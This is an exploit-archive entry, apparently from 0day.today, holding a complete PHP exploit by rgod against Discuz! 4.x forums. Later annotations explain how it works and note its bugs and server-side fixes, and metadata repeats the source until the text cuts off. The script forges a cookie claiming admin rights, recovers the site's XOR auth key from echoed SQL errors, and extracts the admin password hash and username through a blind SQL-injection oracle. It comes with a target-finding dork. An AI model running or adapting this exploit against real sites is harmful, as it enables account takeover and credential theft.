ID 1337DAY-ID-1216
Type zdt
Reporter rgod
Modified 2006-11-28T00:00:00
Description
Exploit for unknown platform in category web applications
================================================================
Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit
================================================================
<?php
// CLI proof-of-concept (rgod, 2006) against Discuz! 4.x. Flow, as written
// below: (1) get the board to echo an SQL error containing decoded cookie
// fields, (2) derive the authcode() XOR key from that known plaintext,
// (3) read the admin password hash and username through a boolean
// SQL-injection oracle in the same cookie. The annotations in this file
// point at defects in the script and at the server-side root causes.
print_r('
---------------------------------------------------------------------------
Discuz! 4.x SQL injection / admin credentials disclosure exploit
dork: "powered by discuz!
---------------------------------------------------------------------------
');
// Two positional arguments are mandatory; anything after them is parsed
// later as -p / -P options.
if ($argc<3) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to discuz
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /discuz/ -P1.1.1.1:80
php '.$argv[0].' localhost /discuz/ -p81
---------------------------------------------------------------------------
');
die;
}
// error_reporting(0) hides warnings and notices only (e.g. the undefined
// $data appended to every request); fatal errors such as calling ereg()/
// eregi(), which no longer exist in PHP 7+, still stop the script.
error_reporting(0);
// No CLI time limit; fsockopen() below inherits the 5 s socket timeout.
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
/**
 * Render a byte string as a two-part hex dump: a run of zero-padded lowercase
 * hex values, then "\r\n", then the printable form of the same bytes.
 *
 * Bytes <= 0x20 or > 0x7e are shown as "." in the printable part; every byte
 * is prefixed by one space; after every 15th byte a "\r\n" is appended to
 * both parts. Debug helper — defined here but never called by the script.
 *
 * @param string $string raw bytes to dump
 * @return string hex part . "\r\n" . printable part (just "\r\n" for "")
 */
function quick_dump($string)
{
    $hexPart = '';
    $textPart = '';
    $column = 0;
    $length = strlen($string);
    for ($pos = 0; $pos < $length; $pos++) {
        $byte = ord($string[$pos]);
        // Control bytes, space and everything above DEL become a dot.
        $textPart .= ($byte <= 32 || $byte > 126) ? ' .' : ' ' . $string[$pos];
        // %02x yields the same lowercase two-digit form as the dechex branch.
        $hexPart .= sprintf(' %02x', $byte);
        $column++;
        if ($column === 15) {
            $column = 0;
            $hexPart .= "\r\n";
            $textPart .= "\r\n";
        }
    }
    return $hexPart . "\r\n" . $textPart;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
/**
 * Send one raw HTTP request and leave the whole response in the global $html.
 *
 * Connects directly to $host:$port, or — when $proxy is non-empty — to the
 * "ip:port" proxy after validating it against $proxy_regex. Writes $packet
 * verbatim and reads until the connection closes. Any connection failure
 * prints a message and die()s. All inputs ($proxy, $host, $port,
 * $proxy_regex) and the output ($html) are globals; nothing is returned.
 *
 * @param string $packet complete request (request line, headers, body)
 */
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
// No explicit timeout: the default_socket_timeout set at the top applies.
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
// Direct mode: line-by-line until EOF.
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
// Proxy mode: one byte at a time, and the loop keeps going while the stream
// is not at EOF *or* no "\r\n\r\n" (end of headers) has been seen. If the
// peer closes without ever sending a blank line the condition never turns
// false and this loop does not terminate. eregi() was removed in PHP 7.0.
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
// Option parsing keys on the first two characters only, so "-p81" and
// "-P1.1.1.1:80" work but "-p 81" does not. A one-character argument reads
// $argv[$i][1] past the end (a notice/warning, hidden by error_reporting(0)).
// Note $port stays a string after str_replace(); fsockopen() coerces it.
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
// The path must start and end with "/" because "admincp.php" is appended to
// it directly when the request line is built.
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
// Through a proxy the request line needs an absolute URI; directly, the
// path alone is enough.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "please wait...\n";
//from global.func.php
/**
 * Discuz's authcode() as found in global.func.php: a repeating-key XOR
 * "cipher" wrapped in base64.
 *
 * 'ENCODE': XOR each 32-byte chunk of $string with the key, base64-encode the
 * result and strip the '=' padding. 'DECODE': base64-decode first, then apply
 * the same XOR. Any other $operation XORs without base64 on either side.
 * When $key is empty (or otherwise falsy) the global $discuz_auth_key is used.
 *
 * PHP's string XOR truncates to the shorter operand, so each chunk is cut to
 * strlen($key) bytes. Because this is plain XOR with a fixed key and carries
 * no integrity check, one known plaintext/ciphertext pair reveals the key —
 * which is exactly what the rest of this script exploits. On the application
 * side, an HMAC over the token (or authenticated encryption) is the fix.
 *
 * @param string $string    plaintext (ENCODE) or unpadded base64 token (DECODE)
 * @param string $operation 'ENCODE' or 'DECODE'
 * @param string $key       XOR key; falls back to $GLOBALS['discuz_auth_key']
 * @return string
 */
function authcode($string, $operation, $key = '') {
    $xorKey = $key ? $key : $GLOBALS['discuz_auth_key'];
    $decoding = $operation == 'DECODE';
    $input = $decoding ? base64_decode($string) : $string;
    $chunks = [];
    $total = strlen($input);
    for ($offset = 0; $offset < $total; $offset += 32) {
        // String XOR: result length is min(32-byte chunk, key length).
        $chunks[] = substr($input, $offset, 32) ^ $xorKey;
    }
    $output = implode('', $chunks);
    if ($operation == 'ENCODE') {
        $output = str_replace('=', '', base64_encode($output));
    }
    return $output;
}
//stolen from install.php
/**
 * Build a $length-character alphanumeric string (copied from Discuz's
 * install.php). Reseeds mt_rand() from microtime() on every call, so the
 * output is a function of the clock — fine for the throwaway key this script
 * needs, unsuitable for anything that must stay secret (random_bytes() /
 * random_int() are the CSPRNG alternatives).
 *
 * @param int $length number of characters; 0 or less yields ''
 * @return string characters drawn from [A-Za-z0-9]
 */
function random($length) {
    $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $lastIndex = strlen($alphabet) - 1;
    // Same seed as the original expression; the engine truncates the float to
    // int when passing it to mt_srand(), the cast only makes that explicit.
    mt_srand((int) ((float) microtime() * 1000000));
    $out = '';
    $remaining = $length;
    while ($remaining > 0) {
        $out .= $alphabet[mt_rand(0, $lastIndex)];
        $remaining--;
    }
    return $out;
}
// $agent must stay identical across all phases: per the author's note below,
// the server mixes the User-Agent into the key it uses for the cookie.
$agent="Googlebot/2.1";
//see sql errors... you need auth key,
//it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;)
// Phase 1: obtain a known plaintext/ciphertext pair. $tt is every byte value
// 0..255; "suntzu\tsuntzu\t".$tt (14 + 256 = 270 bytes) is sent in the
// cdb_auth cookie under a fresh random key, and the response is kept only when
// the board echoed the three tab-separated fields back inside an SQL error.
$tt="";for ($i=0; $i<=255; $i++){$tt.=chr($i);}
// No retry cap: a target that does not echo SQL errors keeps this loop
// running forever.
while (1)
{
$discuz_auth_key=random(32);
// Request shape, the same in every phase: admincp.php?action=recyclebin, a
// forged CLIENT-IP header, a Googlebot User-Agent and a cookie claiming
// adminid=1 with a base64 blob in cdb_auth. Together these are a usable
// access-log signature for this tool.
$packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
$packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof
$packet.="User-Agent: $agent\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$tt,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
// $data is never assigned anywhere in this script; this appends "".
$packet.=$data;
sendpacketii($packet);
// Undo HTML escaping of the echoed error text, then cut the three values out
// of the "AND m.password='…'", "AND m.secques='…'" and "AND m.uid='…'"
// fragments. Nothing checks that the markers were found: a response without
// them makes $t[1] undefined and the fields empty (notices suppressed).
$html=html_entity_decode($html);
$html=str_replace("<br />","",$html);
$t=explode("AND m.password='",$html);
$t2=explode("' ",$t[1]);
$pwd_f=$t2[0];
$t=explode("AND m.secques='",$html);
$t2=explode("'\n",$t[1]);
$secques_f=$t2[0];
$t=explode("AND m.uid='",$html);
$t2=explode("'\x0d",$t[1]);
$uid_f=$t2[0];
$my_string=$pwd_f."\t".$secques_f."\t".$uid_f;
// Accept only a reading of exactly 270 bytes containing no '='; anything else
// is treated as a mangled echo and the key is re-rolled. eregi() is gone in
// PHP 7+. Root cause on the server: SQL error text, including decoded cookie
// values, is returned to the client.
if ((strlen($my_string)==270) and (!eregi("=",$my_string))){
break;
}
}
// Phase 2: recover the server's authcode key one byte at a time. $temp is the
// probe re-encoded under the random key still held in $discuz_auth_key (a
// global, so authcode() picks it up). For key position $j, a trial key of $j
// 'a's plus a candidate byte is installed; because authcode() is plain XOR,
// byte $j of the decode matches the server's echoed byte exactly when the
// candidate equals the real key byte.
$temp = authcode("suntzu\tsuntzu\t".$tt,"ENCODE");
//calculating key...
$key="";
for ($j=0; $j<32; $j++){
// The inner loop stops at 254, so a key byte of 0xff is never found; nothing
// checks afterwards that exactly 32 bytes were recovered.
for ($i=0; $i<255; $i++){
$aa="";
// Left-pad with 'a' so the candidate lands on position $j (str_repeat would do).
if ($j<>0){
for ($k=1; $k<=$j; $k++){
$aa.="a";
}
}
$GLOBALS['discuz_auth_key']=$aa.chr($i);
$t = authcode($temp,"DECODE");
// Loose == between two one-byte strings; fine here since both are single chars.
if ($t[$j]==$my_string[$j]){
$key.=chr($i);
}
}
}
//echo "AUTH KEY ->".$key."\r\n";
// From here on every cookie is encoded with the recovered key, so the server
// decodes it to exactly the bytes this script chose.
$GLOBALS['discuz_auth_key']=$key;
echo "pwd hash (md5) -> ";
// Candidate byte values for the hash: NUL (terminator), '0'-'9', 'a'-'f'.
// $chars is undefined at this point; the "$chars[0]=0" assignment creates it
// as the array [0] (this is a different variable from the $chars local in
// random()).
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
// Phase 3: boolean SQL-injection oracle, one request per (position, byte)
// guess. The payload rides in the cdb_auth cookie, encoded with the key
// recovered above; the oracle is whether "action=groupexpiry" appears in the
// response. The loop ends when a NUL is confirmed (end of the stored value)
// and pauses 1 s after each confirmed character. Server-side root cause:
// values decoded from the cookie reach the query unparameterised (the
// author's notes below name base64 and extract() as the reasons magic_quotes
// does not help); prepared statements and not trusting a client-supplied
// adminid are the fix. eregi() does not exist in PHP 7+.
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
//you can use every char because of base64_decode()...so this bypass magic quotes...
//and some help by extract() to overwrite vars
$sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
$packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
$packet.="User-Agent: $agent\r\n";
$packet.="CLIENT-IP: 1.2.3.4\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
// $data is never assigned in this script; appends "".
$packet.=$data;
sendpacketii($packet);
if (eregi("action=groupexpiry",$html)){
$password.=chr($i);echo chr($i);sleep(1);break;
}
}
// Reached only when the last candidate (255, never in $chars) was tried
// without a match for this position.
if ($i==255) {
die("\nExploit failed...");
}
}
$j++;
}
echo "\nadmin user -> ";
// Same oracle loop as for the password hash, now for m.username; every byte
// value 0..255 is tried because usernames are not limited to hex. Same
// request signature (recyclebin action, CLIENT-IP 1.2.3.4, Googlebot UA,
// adminid=1 cookie) and same 1 s pause per confirmed character.
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
$packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
$packet.="User-Agent: $agent\r\n";
$packet.="CLIENT-IP: 1.2.3.4\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
// $data is never assigned in this script; appends "".
$packet.=$data;
sendpacketii($packet);
// eregi() was removed in PHP 7.0.
if (eregi("action=groupexpiry",$html)){
$admin.=chr($i);echo chr($i);sleep(1);break;
}
// Fires when the last candidate was tried for this position without a match.
if ($i==255) {die("\nExploit failed...");}
}
$j++;
}
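/**
 * Check whether $hash begins with 32 lowercase hex characters after trim().
 *
 * Used as the final success test on the recovered password hash. The pattern
 * is anchored at the start only (as in the original), so bytes after the 32
 * characters are ignored; trim() strips surrounding whitespace and NUL, which
 * is why the NUL-terminated $password built above passes.
 *
 * Fix: ereg() was removed in PHP 7.0, so the original call is a fatal error on
 * any current interpreter; preg_match() with the same pattern replaces it and
 * the boolean is derived from its 1/0/false result.
 *
 * @param string $hash candidate string
 * @return bool
 */
function is_hash($hash)
{
    return preg_match('/^[a-f0-9]{32}/', trim($hash)) === 1;
}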
// Final verdict: $password holds the recovered bytes plus the NUL terminator;
// is_hash() trims the NUL and checks for 32 lowercase hex characters. The
// recovered username ($admin) is not validated at all.
if (is_hash($password)) {
echo "exploit succeeded...";
}
else {
echo "exploit failed...";
}
?>
# 0day.today [2018-01-01] #
{"id": "1337DAY-ID-1216", "bulletinFamily": "exploit", "title": "Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit", "description": "Exploit for unknown platform in category web applications", "published": "2006-11-28T00:00:00", "modified": "2006-11-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/1216", "reporter": "rgod", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-01-01T05:15:01", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T01:16:28", "value": 3.6}}, "hash": "007017278c2b534ec4c794ec0aeb5fe551dfa32e520093e46eed5f3bbae99386", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "75b2b48779bc28cd5ace195aa1786129", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "f8a5af6562ec96af31072835bfdf4363", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "75f28477e434a7e3158f885e06336932", "key": "sourceData"}, {"hash": "e5a443e07a4c25f9a6bfc5a8adbe9ead", "key": "sourceHref"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "08eb875e8048d9a2c73c56168a8b2d03", "key": "modified"}, {"hash": "08eb875e8048d9a2c73c56168a8b2d03", "key": "published"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "history": [], "href": "http://0day.today/exploit/description/1216", "id": "1337DAY-ID-1216", "lastseen": "2016-04-20T01:16:28", "modified": "2006-11-28T00:00:00", "objectVersion": "1.0", "published": "2006-11-28T00:00:00", "references": [], "reporter": "rgod", "sourceData": 
"================================================================\r\nDiscuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit\r\n================================================================\r\n\r\n\r\n\r\n<?php\r\nprint_r('\r\n---------------------------------------------------------------------------\r\nDiscuz! 4.x SQL injection / admin credentials disclosure exploit\r\ndork: \"powered by discuz!\r\n---------------------------------------------------------------------------\r\n');\r\nif ($argc<3) {\r\n print_r('\r\n---------------------------------------------------------------------------\r\nUsage: php '.$argv[0].' host path OPTIONS\r\nhost: target server (ip/hostname)\r\npath: path to discuz\r\nOptions:\r\n -p[port]: specify a port other than 80\r\n -P[ip:port]: specify a proxy\r\nExample:\r\nphp '.$argv[0].' localhost /discuz/ -P1.1.1.1:80\r\nphp '.$argv[0].' localhost /discuz/ -p81\r\n---------------------------------------------------------------------------\r\n');\r\n die;\r\n}\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\n\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = 
preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$port=80;\r\n$proxy=\"\";\r\nfor ($i=3; $i<$argc; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\necho \"please wait...\\n\";\r\n\r\n//from global.func.php\r\nfunction authcode($string, $operation, $key = '') {\r\n\t$key = $key ? $key : $GLOBALS['discuz_auth_key'];\r\n\t$coded = '';\r\n\t$keylength = 32;\r\n\t$string = $operation == 'DECODE' ? base64_decode($string) : $string;\r\n \tfor($i = 0; $i < strlen($string); $i += 32) {\r\n\t\t$coded .= substr($string, $i, 32) ^ $key;\r\n\t}\r\n\t$coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded;\r\n\treturn $coded;\r\n}\r\n\r\n//stolen from install.php\r\nfunction random($length) {\r\n\t$hash = '';\r\n\t$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';\r\n\t$max = strlen($chars) - 1;\r\n\tmt_srand((double)microtime() * 1000000);\r\n\tfor($i = 0; $i < $length; $i++) {\r\n\t\t$hash .= $chars[mt_rand(0, $max)];\r\n\t}\r\n\treturn $hash;\r\n}\r\n\r\n$agent=\"Googlebot/2.1\";\r\n//see sql errors... 
you need auth key,\r\n//it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;)\r\n$tt=\"\";for ($i=0; $i<=255; $i++){$tt.=chr($i);}\r\nwhile (1)\r\n{\r\n $discuz_auth_key=random(32);\r\n $packet =\"GET \".$p.\"admincp.php?action=recyclebin HTTP/1.0\\r\\n\";\r\n $packet.=\"CLIENT-IP: 999.999.999.999\\r\\n\";//spoof\r\n $packet.=\"User-Agent: $agent\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Cookie: adminid=1; cdb_sid=1; cdb_auth=\".authcode(\"suntzu\\tsuntzu\\t\".$tt,\"ENCODE\").\";\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n sendpacketii($packet);\r\n $html=html_entity_decode($html);\r\n $html=str_replace(\"<br />\",\"\",$html);\r\n $t=explode(\"AND m.password='\",$html);\r\n $t2=explode(\"' \",$t[1]);\r\n $pwd_f=$t2[0];\r\n $t=explode(\"AND m.secques='\",$html);\r\n $t2=explode(\"'\\n\",$t[1]);\r\n $secques_f=$t2[0];\r\n $t=explode(\"AND m.uid='\",$html);\r\n $t2=explode(\"'\\x0d\",$t[1]);\r\n $uid_f=$t2[0];\r\n $my_string=$pwd_f.\"\\t\".$secques_f.\"\\t\".$uid_f;\r\n if ((strlen($my_string)==270) and (!eregi(\"=\",$my_string))){\r\n break;\r\n }\r\n}\r\n$temp = authcode(\"suntzu\\tsuntzu\\t\".$tt,\"ENCODE\");\r\n//calculating key...\r\n$key=\"\";\r\nfor ($j=0; $j<32; $j++){\r\n for ($i=0; $i<255; $i++){\r\n $aa=\"\";\r\n if ($j<>0){\r\n for ($k=1; $k<=$j; $k++){\r\n $aa.=\"a\";\r\n }\r\n }\r\n $GLOBALS['discuz_auth_key']=$aa.chr($i);\r\n $t = authcode($temp,\"DECODE\");\r\n if ($t[$j]==$my_string[$j]){\r\n $key.=chr($i);\r\n }\r\n }\r\n}\r\n\r\n//echo \"AUTH KEY ->\".$key.\"\\r\\n\";\r\n$GLOBALS['discuz_auth_key']=$key;\r\n\r\necho \"pwd hash (md5) -> \";\r\n$chars[0]=0;//null\r\n$chars=array_merge($chars,range(48,57)); //numbers\r\n$chars=array_merge($chars,range(97,102));//a-f letters\r\n$j=1;$password=\"\";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\n for ($i=0; $i<=255; $i++)\r\n {\r\n if 
(in_array($i,$chars))\r\n {\r\n //you can use every char because of base64_decode()...so this bypass magic quotes...\r\n //and some help by extract() to overwrite vars\r\n $sql=\"999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=\".$i.\"),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*\";\r\n $packet =\"GET \".$p.\"admincp.php?action=recyclebin& HTTP/1.0\\r\\n\";\r\n $packet.=\"User-Agent: $agent\\r\\n\";\r\n $packet.=\"CLIENT-IP: 1.2.3.4\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Cookie: adminid=1; cdb_sid=1; cdb_auth=\".authcode(\"suntzu\\tsuntzu\\t\".$sql,\"ENCODE\").\";\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n sendpacketii($packet);\r\n if (eregi(\"action=groupexpiry\",$html)){\r\n $password.=chr($i);echo chr($i);sleep(1);break;\r\n }\r\n }\r\n if ($i==255) {\r\n die(\"\\nExploit failed...\");\r\n }\r\n }\r\n$j++;\r\n}\r\n\r\necho \"\\nadmin user -> \";\r\n$j=1;$admin=\"\";\r\nwhile (!strstr($admin,chr(0)))\r\n{\r\n for ($i=0; $i<=255; $i++)\r\n {\r\n $sql=\"999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=\".$i.\"),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*\";\r\n $packet =\"GET \".$p.\"admincp.php?action=recyclebin& HTTP/1.0\\r\\n\";\r\n $packet.=\"User-Agent: $agent\\r\\n\";\r\n $packet.=\"CLIENT-IP: 1.2.3.4\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Cookie: adminid=1; cdb_sid=1; cdb_auth=\".authcode(\"suntzu\\tsuntzu\\t\".$sql,\"ENCODE\").\";\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n sendpacketii($packet);\r\n if (eregi(\"action=groupexpiry\",$html)){\r\n 
$admin.=chr($i);echo chr($i);sleep(1);break;\r\n }\r\n if ($i==255) {die(\"\\nExploit failed...\");}\r\n }\r\n$j++;\r\n}\r\n\r\nfunction is_hash($hash)\r\n{\r\n if (ereg(\"^[a-f0-9]{32}\",trim($hash))) {return true;}\r\n else {return false;}\r\n}\r\n\r\nif (is_hash($password)) {\r\n echo \"exploit succeeded...\";\r\n}\r\nelse {\r\n echo \"exploit failed...\";\r\n}\r\n?>\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/1216", "title": "Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit", "type": "zdt", "viewCount": 10}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:16:28"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "00157601768b634735774d15ccd18f9e"}, {"key": "href", "hash": "a157c0292bdbff9153ca5d2697ef01d5"}, {"key": "modified", "hash": "08eb875e8048d9a2c73c56168a8b2d03"}, {"key": "published", "hash": "08eb875e8048d9a2c73c56168a8b2d03"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "980ee7dc8600290f4d13f1f46c609aca"}, {"key": "sourceData", "hash": "f649337c7944d009543cb7cfe1e708dc"}, {"key": "sourceHref", "hash": "85bcd23249d49a79acd67764266b3a3a"}, {"key": "title", "hash": "75b2b48779bc28cd5ace195aa1786129"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "556dc2c3b52e5965b7defd9d0e913029eb630dcc644f2cb6792f58bd386c3592", "viewCount": 11, "enchantments": {"vulnersScore": 5.0}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/1216", "sourceData": "================================================================\r\nDiscuz! 
4.x SQL Injection / Admin Credentials Disclosure Exploit\r\n================================================================\r\n\r\n\r\n\r\n<?php\r\nprint_r('\r\n---------------------------------------------------------------------------\r\nDiscuz! 4.x SQL injection / admin credentials disclosure exploit\r\ndork: \"powered by discuz!\r\n---------------------------------------------------------------------------\r\n');\r\nif ($argc<3) {\r\n print_r('\r\n---------------------------------------------------------------------------\r\nUsage: php '.$argv[0].' host path OPTIONS\r\nhost: target server (ip/hostname)\r\npath: path to discuz\r\nOptions:\r\n -p[port]: specify a port other than 80\r\n -P[ip:port]: specify a proxy\r\nExample:\r\nphp '.$argv[0].' localhost /discuz/ -P1.1.1.1:80\r\nphp '.$argv[0].' localhost /discuz/ -p81\r\n---------------------------------------------------------------------------\r\n');\r\n die;\r\n}\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; 